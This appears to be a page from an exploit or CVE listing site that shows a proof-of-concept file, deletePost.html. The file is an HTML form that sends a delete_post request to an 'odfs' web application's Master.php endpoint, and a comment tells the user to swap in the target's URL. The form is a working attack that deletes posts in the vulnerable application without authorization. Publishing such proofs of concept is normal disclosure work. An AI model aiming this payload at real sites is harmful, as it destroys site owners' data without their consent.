4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / deletePost.html HTML

<!-- Replace form action URL with the target's URL -->
<form action="http://localhost/odfs/classes/Master.php?f=delete_post" method="post" id="manage-user">	
  <input type="text" name="id" value="" placeholder="enter POST ID to delete" required>
  <button type="submit">Delete Post</button>
</form>